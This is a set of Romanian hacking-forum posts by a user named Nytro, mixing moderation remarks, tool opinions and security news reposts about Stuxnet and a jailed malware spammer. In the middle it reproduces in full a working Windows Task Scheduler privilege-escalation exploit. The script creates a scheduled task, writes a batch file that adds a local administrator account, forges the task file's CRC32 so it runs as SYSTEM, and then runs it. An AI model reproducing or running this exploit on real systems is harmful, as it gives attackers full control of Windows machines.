Nytro

Mue recaptcha. Orice, numai aia nu.

Vim si Emacs e naspa. Notepad++, Gedit si Kwrite imi plac.

Lumea inca e de parere ca hackerii sunt niste singuratici rupti de lume care lucreaza la subsolul unei case si ca nu au nici o legatura cu lumea exterioara, trist.

Ban amandoi 2 zile, sa va mai calmati.

Google, Microsoft, NASA si Yahoo organizeaza competitia de hacking legal de Laurentiu Crisu | 3 decembrie 2010 Saptamana aceasta va avea loc cea de-a doua editie a competitiei Random Hacks of Kindness (RHoK), care se va desfasura in mai multe orase din intreaga lume si va aduce de aceeasi parte a baricadei atat hackerii cat si unii dintre cei mai buni ingineri software. Evenimentul, gazduit de Google, Microsoft, Yahoo, NASA si Banca Mondiala, se va desfasura pe 4-6 decembrie 2010 si isi propune sa foloseasca tehnologia pentru a face lumea un loc mai bun, prin construirea unei comunitati de inovatie. “Hackathon-ul”, dupa cum l-au numit reprezentantii, aduce laolalta cei mai talentati hackeri din toate colturile lumii, dezvoltatori de software si experti in computere, care isi dedica timpul pentru a rezolva probleme din lumea reala. La sfarsitul celor doua zile de concurs, o aplicatie va selecta echipa care merita titlul de “RHoKstars”. Hack-urile castigatore in cadrul primei editii a acestei competitii au fost folosite pentru a furniza asistenta de urgenta in timpul cutremurelor din Haiti si Chile. “Evenimentul le ofera hacker-ilor oportunitatea de a-si folosi abilitatile in scopuri nobile, sub indrumarea expertilor care inteleg provocarile vietii reale”, a declarat Todd Khozein, reprezentant al RHoK. Din pacate, niciun oras din Romania nu va gazdui acest concurs. Pentru cei care isi doresc insa sa participe, cea mai apropiata locatie de tara noastra ar fi Berlin, Germania. Sursa: Google, Microsoft, NASA si Yahoo organizeaza competitia de hacking legal | Hit.ro

E mult mai rapida versiunea simpla, ai doar o comparatie si o atribuire, nu o gramada de calcule. In plus apelezi 2 functii, si apelurile de functii sunt consumatoare si de resurse (stiva) si de procesor (revenire din functie...). Dar asta conteaza doar daca faci milioane de apeluri ale functie pentru maxim.

Ratati care isi dau credite pentru multe lucruri cu care nu au nici o legatura. Copiaza exploituri din diverse locuri. Foarte probabil skids. Exploits Database by Offensive Security

Fara Java sau Flash, fisierele se pot descarca de catre altcineva in timp ce se uploadeaza... http://ge.tt/

1) Cu ce te ajuta asta? 2) Sunt intrebari care nu primesc nici un raspuns, in veci, ai atata rabdare? De ce sa nu se raspunda la o intrebare? 3) Care e rostul, invatam sa numaram? Idei stupide.

Dupa cum observati, categoria Offtopic este foarte vizitata, deoarece acolo se posteaza tot felul de lucruri, mai mult sau mai putin utile. Problema apare cand se posteaza si lucruri care isi au locul in alta parte, de cele mai multe ori cererile de diverse lucruri si cererea ajutorului in diverse probleme. Aceste subiecte au categorii speciale in care sa se poata posta, "Cereri" si "Ajutor". Nu vad de ce sa se posteze totul la "Offtopic". Sectiunea este pentru posturile care nu se incadreaza in alte categorii. Desigur, cred ca sunt mai mari sansele sa primiti un raspuns la "Offtopic" decat la locul special, pentru ca e o categorie mai vizitata, dar se va ajunge la balamuc astfel. Dupa cum o parte dintre voi ati observat, daca veti posta intr-o categorie gresita (nu numai la "Offtopic") veti primi un avertisment. Asadar, inainte de a deschide un topic, cititi si numele categoriilor, si descrierile lor daca nu ati inteles ce anume se posteaza in acele categorii. Intr-adevar, daca doriti sa postati un tutorial despre programare, nu va voi sanctiona daca alegeti sa il postati la "Tutoriale Romana/Engleza" sau "Programare", din simplul motiv ca se incadreaza in ambele categorii si in plus este si ceva util care ajuta membrii forumului. Insa daca veti posta toate prostiile anapoda veti fi avertizati. Inca o data, putina atentie inainte de a posta.

Modul de vedere ("Birds eye") din satelit e excelent. Incercati, sunt sigur ca o sa va placa. http://www.bing.com/maps/ Sincer, nu se compara Yahoo! si Google cu asa ceva... 1 - 0 pentru Microsoft din partea mea.

Probabil trimiti si tu 20 de mailuri cu istealer sa furi niste parole de messenger... Nu te speria, pe tine nu o sa te bage nimeni in seama. Da, daca cineva iti fura portofelul vrei sa intre la puscarie, daca cineva iti fura banii din cont de ce sa nu intre la puscarie? De fapt voi ati merita sa infundati puscariile, macar cei ce fura portofele "muncesc" sa le aiba, voi luati 2 programe care nu stiti ce fac si gata, sunteti hackeri cu bani. La cateva sute de euro nu se uita nimeni, daca ai fi baiat destept si ai face mai mult acum as posta o stire despre tine, dar sunt sigur ca nu o sa fie cazul.

"""Hacker""" Gets 18 Months in U.K. Prison Mai bine spus "Looser". Bun, am mai scapat de un hot. La puscarie cu toti cei ca el, la munca nu la intins mana. A Scottish man was sentenced today to 18 months in prison for spamming out e-mails laced with malware and stealing data. A 33-year-old Scottish man was sentenced today to 18 months in prison in the U.K. for spamming out malware-infected e-mails and stealing data. The sentencing today of Matthew Anderson of Drummuir, Aberdeenshire, Scotland, brought to an end to an investigation first launched four years ago. According to the Metropolitan Police Service (MPS), Anderson was part of a ring that targeted hundreds of businesses in the U.K. with malware starting in 2005. The conspiracy was operated by members of a cyber-crew called m00p that spammed out millions of e-mails laced with malware, authorities said. It was Anderson's job to manage the operation by composing the e-mails and distributing them with virus attachments, police said. The malware allowed Anderson to access private data stored on computers without the knowledge of the computer's owner, according to police. "This organized online criminal network infected huge numbers of computers around the world, especially targeting U.K. businesses and individuals," said Detective Constable Bob Burls, from the MPS Central e-Crime Unit, in a statement. "Matthew Anderson methodically exploited computer users not only for his own financial gain but also violating their privacy. They used sophisticated computer code to commit their crimes." The investigation resulted in the arrests of three men—including Anderson—on June 27, 2006. No charges were filed against one of the men, while the other pleaded guilty in 2008, according to reports. According to police, a number of computers were seized at residential addresses in both countries in addition to the suspects' servers as part of the investigation. When online, Anderson used the profile names of "aobuluz" and "warpigs," authorities said, and operated his illegal business behind the front of an online company called Optom Security that offered security software. Among the evidence police found were screenshots on Anderson's computers taken from other people's Webcams as well as copies of wills, medial reports, password lists and other content, police said. "The Internet means criminals have increased opportunities to commit crime internationally; however, I'd like to reassure the public that the international law enforcement and antivirus companies' response is increasingly sophisticated," Burls said. "As this case shows, criminals can't hide online and are being held to account for their actions. A complex investigation like this demonstrates what international cooperation can achieve." Sursa: Hacker Gets 18 Months in U.K. Prison - Security - News & Reviews

Exploit code for one of the zero-day vulnerabilities exploited by Stuxnet Exploit code for one of the zero-day vulnerabilities exploited by the Stuxnet worm has made its way online. The code exploits a Windows Task Scheduler vulnerability, and can be used to escalate privileges. The exploit code was added to the Exploit Database operated by Offensive Security Nov. 20. There is no patch currently available for the flaw, though Microsoft said one is forthcoming. “Microsoft is aware of the public posting of the details of an Elevation of Privilege vulnerability used by the Stuxnet malware,” Jerry Bryant, group manager of Response Communications at Microsoft, said in a statement. “We first discussed this vulnerability in September 2010. Because this is a local Elevation-of-Privilege issue, it requires attackers to be already able to execute code on a targeted machine. A bulletin addressing this issue will be released as part of our regular monthly bulletin cycle in the near future.” The vulnerability was one of four zero-days used by the malware in its bid to compromise industrial control systems. The three others have all been patched since the worm was discovered this summer. Researchers have spent the last several months trying to get to the bottom of the Stuxnet worm. Just recently, Symantec reported evidence that it targets frequency converter drives used to control the speed of motors, and that the actual goal of the worm may be to disrupt nuclear programs. In particular, speculation has focused on Iran as a possible target, as it has been the site of many of Stuxnet's infections. Among the other zero-days Stuxnet has been observed using are the .LNK shortcut vulnerability, patched in August; a vulnerability in the Windows Print Spooler service (MS10-061), patched in September; and another privilege escalation issue (MS10-073), patched in a massive update in October. Early versions of the worm also spread without a vulnerability at all; instead abusing How Stuxnet Malware Used AutoRun Trick to Infect PCs - Security - News & Reviews to compromise machines through infected USB devices. Sursa: Exploit Code for Windows Zero-Day Targeted by Stuxnet Goes Public - Security - News & Reviews

Windows Task Scheduler Privilege Escalation 0day # Exploit Title: Windows Task Scheduler Privilege Escalation 0day # Date: 20-11-2010 # Author: webDEViL # Tested on: Windows 7/2008 x86/x64 <job id="tasksch-wD-0day"> <script language="Javascript"> crc_table = new Array( 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B, 0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01, 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F, 0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5, 0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713, 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9, 0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D ); var hD='0123456789ABCDEF'; function dec2hex(d) { h=''; for (i=0;i<8;i++) { h = hD.charAt(d&15)+h; d >>>= 4; } return h; } function encodeToHex(str){ var r=""; var e=str.length; var c=0; var h; while(c<e){ h=str.charCodeAt(c++).toString(16); while(h.length<3) h="0"+h; r+=h; } return r; } function decodeFromHex(str){ var r=""; var e=str.length; var s=0; while(e>1){ r=r+String.fromCharCode("0x"+str.substring(s,s+2)); s=s+2; e=e-2; } return r; } function calc_crc(anyForm) { anyTextString=decodeFromHex(anyForm); Crc_value = 0xFFFFFFFF; StringLength=anyTextString.length; for (i=0; i<StringLength; i++) { tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF; Table_value = crc_table[tableIndex]; Crc_value >>>= 8; Crc_value ^= Table_value; } Crc_value ^= 0xFFFFFFFF; return dec2hex(Crc_value); } function rev_crc(leadString,endString,crc32) { // // First, we calculate the CRC-32 for the initial string // anyTextString=decodeFromHex(leadString); Crc_value = 0xFFFFFFFF; StringLength=anyTextString.length; //document.write(alert(StringLength)); for (var i=0; i<StringLength; i++) { tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF; Table_value = crc_table[tableIndex]; Crc_value >>>= 8; Crc_value ^= Table_value; } // // Second, we calculate the CRC-32 without the final string // crc=parseInt(crc32,16); crc ^= 0xFFFFFFFF; anyTextString=decodeFromHex(endString); StringLength=anyTextString.length; for (var i=0; i<StringLength; i++) { tableIndex=0; Table_value = crc_table[tableIndex]; while (((Table_value ^ crc) >>> 24) & 0xFF) { tableIndex++; Table_value = crc_table[tableIndex]; } crc ^= Table_value; crc <<= 8; crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1); } // // Now let's find the 4-byte string // for (var i=0; i<4; i++) { tableIndex=0; Table_value = crc_table[tableIndex]; while (((Table_value ^ crc) >>> 24) & 0xFF) { tableIndex++; Table_value = crc_table[tableIndex]; } crc ^= Table_value; crc <<= 8; crc |= tableIndex; } crc ^= Crc_value; // // Finally, display the results // var TextString=dec2hex(crc); var Teststring=''; Teststring=TextString.substring(6,8); Teststring+=TextString.substring(4,6); Teststring+=TextString.substring(2,4); Teststring+=TextString.substring(0,2); return Teststring } function decodeFromHex(str){ var r=""; var e=str.length; var s=0; while(e>1){ r=r+String.fromCharCode("0x"+str.substring(s,s+2)); s=s+2; e=e-2; } return r; } </script> <script language="VBScript"> dim output set output = wscript.stdout output.writeline " Task Scheduler 0 day - Privilege Escalation " output.writeline " Should work on Vista/Win7/2008 x86/x64" output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat" Set objShell = CreateObject("WScript.Shell") objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True Set fso = CreateObject("Scripting.FileSystemObject") Set a = fso.CreateTextFile(biatchFile, True) a.WriteLine ("net user /add test123 test123") a.WriteLine ("net localgroup administrators /add test123") a.WriteLine ("schtasks /delete /f /TN wDw00t") Function ReadByteArray(strFileName) Const adTypeBinary = 1 Dim bin Set bin = CreateObject("ADODB.Stream") bin.Type = adTypeBinary bin.Open bin.LoadFromFile strFileName ReadByteArray = bin.Read 'output.writeline ReadByteArray End Function Function OctetToHexStr (arrbytOctet) Dim k OctetToHexStr = "" For k = 3 To Lenb (arrbytOctet) OctetToHexStr = OctetToHexStr _ & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2) Next End Function strFileName="C:\windows\system32\tasks\wDw00t" hexXML = OctetToHexStr (ReadByteArray(strFileName)) 'output.writeline hexXML crc32 = calc_crc(hexXML) output.writeline "Crc32 Original: "+crc32 Set xmlDoc = CreateObject("Microsoft.XMLDOM") 'permissions workaround 'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True 'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True Set objShell = WScript.CreateObject("WScript.Shell") Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t") Do Until objExecObject.StdOut.AtEndOfStream strLine = strLine & objExecObject.StdOut.ReadLine() Loop hexXML = "FFFE3C00"+OctetToHexStr(strLine) 'output.writeline hexXML Set ts = fso.createtextfile ("wDw00t.xml") For n = 1 To (Len (hexXML) - 1) step 2 ts.write Chr ("&h" & Mid (hexXML, n, 2)) Next ts.close xmlDoc.load "wDw00t.xml" Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author") Author.text = "LocalSystem" Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId") UserId.text = "S-1-5-18" xmldoc.save(strFileName) hexXML = OctetToHexStr (ReadByteArray(strFileName)) leadString=hexXML+"3C0021002D002D00" endString="2D002D003E00" 'output.writeline leadString impbytes=rev_crc(leadString,endString,crc32) output.writeline "Crc32 Magic Bytes: "+impbytes finalString = leadString+impbytes+endString forge = calc_crc(finalString) output.writeline "Crc32 Forged: "+forge strHexString="FFFE"+finalString Set fso = CreateObject ("scripting.filesystemobject") Set stream = CreateObject ("adodb.stream") Set ts = fso.createtextfile (strFileName) For n = 1 To (Len (strHexString) - 1) step 2 ts.write Chr ("&h" & Mid (strHexString, n, 2)) Next ts.close Set objShell = CreateObject("WScript.Shell") objShell.Run "schtasks /change /TN wDw00t /disable",,True objShell.Run "schtasks /change /TN wDw00t /enable",,True objShell.Run "schtasks /run /TN wDw00t",,True </script> </job> E exploit-ul folosit de worm-ul Stuxnet. Sursa: Windows Task Scheduler Privilege Escalation 0day

MinGW e portarea (nu completa cred) a compilatorului GNU pentru Linux pe sisteme Windows. Si compilatoarele GNU respecta cel mai bine standardele internationale, nu ca produsele marca Microsoft care vin cu propriile idei.

Inca un topic demn de gunoi. Mai bine facea un browser, macar era facut de el...

E foarte bine pentru inceput, continua, vreau sa vad player-ul.

Facusem eu ceva pentru Linux, din iptables. Ideea e simpla. Din cate mi-am dat seama, cred ca trimite un bot (sunt multi, nu cred ca ii poti baga la ignore pe toti, na, poate nu vrei sa ii bagi la ignore pe toti care nu ii ai in lista, si nu stiu daca asta chiar va ajuta) un mesaj de "am schimbat avataru ba", si clientul de messenger trimite un raspuns, cam asa ceva, dar nu sunt sigur. Si eu am blocat accesul (DROP la pachete) de la sau catre (nu mai stiu) anumite IP-uri, care ulterior am descoperit ca sunt servere Yahoo!. Si intr-adevar, nu mai detectau daca sunt pe invizibil sau nu, dar nici nu mai primeam sau nu puteam trimite mesaje, sau cine stie ce alte probleme erau. Oricum, cred ca se poate face ceva. PS: Nu prea ma pricep, din iptables se pot face limitari in functie de continutul unui pachet, adica in functie de date? Ar fi de preferat ceva simplu cum ar fi "daca pachetul contine sirul/octetii xyz"... Sau orice altceva.

Da, ce bucurie, gasesti site-ul lu' nea Vasile si "il spargi"... Daca tot vreti sa va testati capacitatile, testati-le pe un site pe care aveti un motiv sa le testati, nu cautati acolo niste site-uri de 2 lei ca sa aveti ce posta la Show Off...

Din titlu, descriere si site-urile recomandate pare o mare, al dracu de mare, tampenie de doi lei.

Exista lucruri mai importante pe lume decat sa stai sa citesti posturi stupide, sa dai banuri sau avertismente

Da, e bine gandita

Imi place cum arata. Da, util.

Nu i-am dat ban pentru asta, i-am dat ban pentru postul cu Madalina Manole si inca 3-4 posturi stupide. Vezi toate posturile lui.